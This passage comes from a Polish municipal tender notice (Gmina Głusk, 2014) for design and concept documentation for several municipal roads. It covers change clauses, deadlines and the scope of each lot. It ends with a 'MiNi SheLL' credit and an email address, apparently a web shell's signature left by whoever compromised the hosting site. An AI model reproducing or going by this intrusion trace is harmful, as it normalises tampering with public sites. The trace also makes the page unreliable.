a) zmiana projektanta    w trakcie realizacji przedmiotu umowy musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana przez Zamawiającego, który zaakceptuje taką zmianę wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i do doświadczenia osób wskazanych w ofercie Wykonawcy;
b) Wykonawca przedłoży Zamawiającemu propozycję zmiany, o której mowa w pkt. a) nie później niż 7 dni przed planowaną zmianą  którejkolwiek osoby. Jakakolwiek przerwa 
w realizacji przedmiotu umowy wynikająca z braku projektanta  będzie traktowana jako przerwa wynikła z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do zmiany terminu zakończenia robót;
c) skierowanie, bez akceptacji Zamawiającego, do kierowania robotami innych osób niż wskazane 
w ofercie Wykonawcy stanowi podstawę odstąpienia od umowy przez Zamawiającego z winy Wykonawcy;
4. Zmiany zakresu robót o roboty nieprzewidziane / zmniejszenie zakresu opracowań.
a)  Zamawiający może zmniejszyć  zakres realizacji umowy,
b) W przypadku wystąpienia konieczności zmniejszenia  zakresu prac projektowych  będzie ono rozliczone w oparciu  o procentowe ilości faktycznie wykonanego zakresu robót  na podstawie protokołu wykonania prac.
c) w przypadku zmiany przewidzianych w SIWZ ilości działek do podziału geodezyjnego , zmiana ta będzie polegała na zwiększeniu  tych ilości , co może spowodować zmianę terminu realizacji  lub zmianę wysokości wynagrodzenia. Zmiana taka będzie możliwa jeśli do podziału będzie więcej niż 7 działek .
d) Zamawiający może udzielić wykonawcy zamówień dodatkowych, nieobjętych zamówieniem podstawowym, zgodnie z warunkami określonymi w ustawie Pzp; 
e) udzielenie zamówienia na usługi  dodatkowe następuje w wyniku konieczności przystąpienia do robót wykraczających poza zakres zamówienia podstawowego - Wykonawca składa wniosek o udzielenie zamówienia wraz z uzasadnieniem i wyceną (protokół konieczności), który zostanie przeanalizowany przez Zamawiającego;
f  ) tylko udzielenie zamówienia na roboty uzupełniające lub dodatkowe w drodze umowy upoważnia wykonawcę do żądania zapłaty za roboty dodatkowe;
- innych warunków umowy, jeżeli w chwili jej zawarcia nie znane były fakty mające na nie wpływ, przy jednoczesnym założeniu, że zakres zmian spowoduje następstwa korzystne dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ugglusk.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Głusk Dominów ul. Rynek 1 20-388 Lublin Pok. Nr 105.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2014 godzina 10:00, miejsce: Urząd Gminy Głusk Dominów ul. Rynek 1 20-388 Lublin Pok. Nr 110 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienia będzie realizowane  w ramach projektu Współpraca JST jako czynnik Rozwoju Lubelskiego  Obszaru Funkcjonalnego współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Pomoc Techniczna 2007 - 2013 oraz budżetu państwa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie  kompleksowej dokumentacji projektowej (technicznej)  dla dwóch zadań inwestycyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla części I. 
 1)  Przebudowa drogi  gminnej nr 107112 L w Dominowie na odcinku od drogi wojewódzkiej nr 835   
      do drogi powiatowej nr 2272 L  na odcinku długości  1240 mb  z budową oświetlania drogowego.
  2) Przebudowa drogi gminnej  Wilczopole (od ul. Wygodnej w Lublinie) - Dominów (do drogi   powiatowej nr 2272 L )  na odcinku długości około 1.600 mb oraz pełnienie nadzorów autorskich dla obu zadań
Przy opracowaniu projektów  należy w szczególności uwzględnić następujący zakres :
- Przed rozpoczęciem prac Wykonawca na podstawie pomiaru ruchu i prognozy ruchu zobowiązany jest określić klasę drogi i wyznaczyć kategorię ruchu oraz przedstawić Zamawiającemu celem akceptacji.
- Opracowanie kompleksowej dokumentacji projektowej w studium projektów budowlanych i wykonawczych, umożliwiających uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej w trybie Ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych  ( Dz. U. z 2013 r. poz. 687 z późn. zm. )- dla drogi Wilczopole - Dominów.
- przygotowanie materiałów niezbędnych do przeprowadzenia  postępowania  przetargowego na wykonanie robót budowlanych , które są wymagane Ustawą Prawo Zamówień Publicznych wraz  z aktami  wykonawczymi  oraz materiałów niezbędnych do prawidłowej realizacji robót budowlanych.
Przy opracowaniu projektów w szczególności  należy uwzględnić :
- budowę lub remont istniejących przepustów ( zgodnie z analizą zlewni  wykonaną przez  Wykonawcę)
- budowę zatok autobusowych i rond nawrotowych dla autobusów miejskich ;
- przebudowę lub budowę chodników ;
- odwodnienie drogi   ( według propozycji i opracowania Wykonawcy),
- utwardzone pobocza na całym odcinku objętym projektem;
- przebudowę istniejących urządzeń obcych ( tylko w razie konieczności ) jeżeli będą one kolidowały              z przebudowywanym odcinkiem drogi gminnej;
- budowę lub przebudowę  zjazdów ( w granicach pasa drogowego); 
- przebudowę skrzyżowań ( w razie konieczności ) dla połączenia z drogą wojewódzką nr 835  i drogami powiatowymi Nr 2272 L  i Nr 2107 L.
- przewidzieć ( w miarę możliwości ) poszerzenie istniejącej jezdni  na drodze gminnej nr 107112 L;
- budowę nowego wydzielonego oświetlenia drogowego przy drodze gminnej nr 107112 L w Dominowie ( uzupełnienie brakującego oświetlenia na długościach  około  500 m + 200 mb ); 
-  uzupełnienie lub wykonanie oznakowania poziomego i pionowego na całych odcinkach dróg.
Zakres opracowań dla części  I obejmuje wykonanie:
a) uzyskanie map do celów projektowych w wersji analogowej ( papierowej) ;
b) projektów  budowlano -wykonawczych -   5 egz. w wersji papierowej i  1 egz. w wersji elektronicznej ( dla obu dróg oddzielnie );
c) projektów budowlano- wykonawczych - 5 egz. w wersji papierowej i 1 egz. w wersji elektronicznej - dla budowy oświetlenia drogowego ( uzupełnienie brakującego oświetlenia , odcinek długości około 0,7km  wzdłuż drogi gminnej nr 107112 L w Dominowie);
c) przedmiarów  robót , kosztorysów inwestorskich  - po 2 egz. w wersji papierowej i 1 egz. w edytowanej wersji elektroniczne dla 3 -ech dokumentacji ;
d) szczegółowych specyfikacji  technicznych  wykonania i odbioru robót budowlanych ( SSTWiORB) - po  1 egz. w wersji papierowej i po 1 egz. w wersji elektronicznej;
h) specyfikacji istotnych warunków zamówienia w zakresie opisu przedmiotu zamówienia dla robót budowlanych realizowanych w oparciu o opracowaną dokumentację projektową  - po 1 egz. w wersji papierowej i po 1 egz. w edytowanej wersji elektronicznej;
i) projektów   stałej  organizacji ruchu ( dla drogi Wilczopole - Dominów )  i zmiany w zatwierdzonym projekcie organizacji ruchu dla drogi gminnej nr 107112 L  , zatwierdzone przez zarządców dróg - po 3 egz. w wersji papierowej;
j) projektów  czasowej organizacji ruchu na czas prowadzenia robót drogowych , zatwierdzone przez zarządców dróg - po 3 egz. w wersji papierowej;
k)materiałów  niezbędnych  do uzyskania decyzji środowiskowych uwarunkowaniach , w tym kartę informacyjną przedsięwzięcia , przygotowana zgodnie z art. 3 ust. 1 pkt 5 ustawy o udostępnianiu informacji o środowisku i jego ochronie , udziale społeczeństwa  w ochronie środowiska oraz ocenach oddziaływania na środowisko - Dz.U. Nr 199 z 2008 r. poz. 1227 , z późn. zm. 
l) uzyskanie prawomocnej decyzji  o środowiskowych uwarunkowaniach realizacji przedsięwzięcia  w tym w szczególności : przygotowanie niezbędnych dokumentów w tym: karta informacyjna oraz w razie potrzeby raport oddziaływania na środowisko.
m) uzyskania pozostałych warunków technicznych: uzgodnień , przyłączenia niezbędnych mediów , odprowadzenia wód deszczowych itp.
n) opracowania projektów budowlanych poszczególnych branż  o szczegółowości  zgodnej z rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego;
o) badań  geotechniczne podłoża gruntowego zgodnie z załącznikiem nr 4 do Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych , jakim powinny odpowiadać drogi publiczne i ich usytuowanie ( Dz. U. z 1999 r. Nr 43 poz. 430);
p)  uzyskanie pozwolenia wodno - prawnego ;
r) uzgodnienia projektu na drogę gminną nr 107112 L Wojewódzkim Konserwatorem Zabytków;
s) sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia ( BIOZ)
t) wykonanie wszelkich niezbędnych opracowań  ( nie wymienionych powyżej)  , których konieczność wyniknie w toku prac projektowych w tym: przewidzieć kanał technologiczny jeśli zgłoszą się zainteresowani użytkownicy.
u) przygotowanie wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej zgodnie z art. 11 d ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych  ( t.j. Dz. U. z 2008 r. Nr 193 poz. 1194 z późn. zm. ) wraz ze wszystkimi niezbędnymi     załącznikami w tym: m.in. mapy zawierające projekty podziału nieruchomości - dla drogi Wilczopole - Dominów   ( do podziału przewiduje się około 5 działek );
w ) sprawowanie nadzoru autorskiego w trakcie wykonywania robót budowlanych  realizowanych  w oparciu o sporządzone dokumentacje - przyjmuje się  około 5  pobytów w ramach nadzoru  autorskiego dla każdej z dróg.
x) ścisła współpraca  ze wszystkimi uczestnikami procesu budowlanego .
y ) wykonanie ( w razie potrzeby) dwukrotnej  aktualizacji  kosztorysu inwestorskiego w ciągu  dwóch  lat od odbioru wykonanych opracowań  ( w terminie wskazanym przez  Zamawiającego)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie  koncepcji  rozwiązań przebudowy   dwóch  dróg na terenie gminy Głusk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)  Przebudowa drogi gminnej  nr 106636 L  ( początek od  ul. Sachsów  w Lublinie  w Abramowicach Prywatnych   do drogi gminnej nr 107100 L - ul. Dwie Topole )  odcinek długości  około 2,0 km .
2)  Przebudowa drogi  gminnej 112440 L  (początek od ulicy Zdrowej  aż do drogi powiatowej nr 2107 L w Wilczopolu , odcinek długości około 1,25 km.
Zakres opracowań dla części  II ( koncepcje ) obejmuje:
 - Przed rozpoczęciem prac Wykonawca na podstawie pomiaru ruchu i prognozy ruchu zobowiązany jest określić klasę drogi i wyznaczyć kategorię ruchu oraz przedstawić Zamawiającemu celem akceptacji.
Opracowane  koncepcje  mają zawierać  : materiał graficzny  ( plan orientacyjny  , plan sytuacyjny przebiegu dróg ) ,  rozwiązania geometryczne  wraz z zagospodarowaniem  pasa drogowego tj.  profile podłużne i przekroje normalne  , rozwiązania komunikacyjne ( zatoki  autobusowe ) określać klasę drogi   i wyznaczyć kategorię ruchu .
Koncepcja ma przewidzieć ( uwzględniać ) również prowadzenie w pasie drogowym mediów : sieci wodociągowej , gazowej ,teleinformatycznej ,  kanalizacji sanitarnej , oświetlenia drogowego .
2. Zaprojektowane koncepcje rozwiązań dostosować do parametrów  dróg miejskich  jako przedłużenie dróg gminnych , na podstawie informacji  z ZDiM  w Lublinie .    
Należy wykonać :
a ) projekty koncepcji  przebudowy  -   3 egz. w wersji papierowej i  1 egz. w wersji elektronicznej (dla obu dróg oddzielnie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com